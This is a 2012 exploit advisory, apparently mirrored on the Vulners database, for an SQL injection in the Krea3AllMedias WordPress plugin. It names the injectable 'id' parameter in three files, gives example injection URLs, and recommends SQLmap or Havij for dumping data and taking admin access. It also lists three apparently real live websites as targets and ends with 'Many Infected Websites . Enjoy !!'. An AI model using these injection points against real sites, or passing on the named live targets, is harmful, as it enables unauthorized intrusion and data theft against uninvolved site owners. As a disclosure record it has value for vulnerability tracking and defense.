Vulners
Lucene search
WordPress Krea3AllMedias SQL Injection
`# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [x] Official Website: http://www.1337day.com 0
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
# 0 0
# 1 ========================================== 1
# 0 0
# 0 1
# 1 dark-puzzle[at]live[at]fr 0
# 0 ========================================== 1
# 1 White Hat 1
# 0 Independant Pentester 0
# 1 exploit coder/bug researcher 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title : Wordpress Plugins - Krea3AllMedias SQL Injection Vulnerability
# Author : Dark-Puzzle (Souhail Hammou)
# Date : 14th September 2012
# Risk : High
# Vendor : www.krea3.fr
# Tested On : Windows XP SP3 - Fr & Backtrack 5 R3
# Greetings : Inj3ct0rs - Offensive Security - Security Focus - Packetstorm Security .
# Contact Me: www.facebook.com/dark-puzzle / [email protected]
#####################################################################################
Krea3AllMedias Wordpress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program .
The 'id' parameter cannot be injected manually because it's impossible to detect the infected column with a Union+Select Request .
Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.
I recommend you using : SQLmap for Linux & Havij For Windows .
#####################################################################################
'id' parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .
#####################################################################################
Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1'
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1'
#####################################################################################
Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5
http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :
http://www.example.com/wp-admin
#####################################################################################
Solution : N/A
#####################################################################################
Many Infected Websites . Enjoy !!
#Datasec Team .
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Sep 2012 00:00Current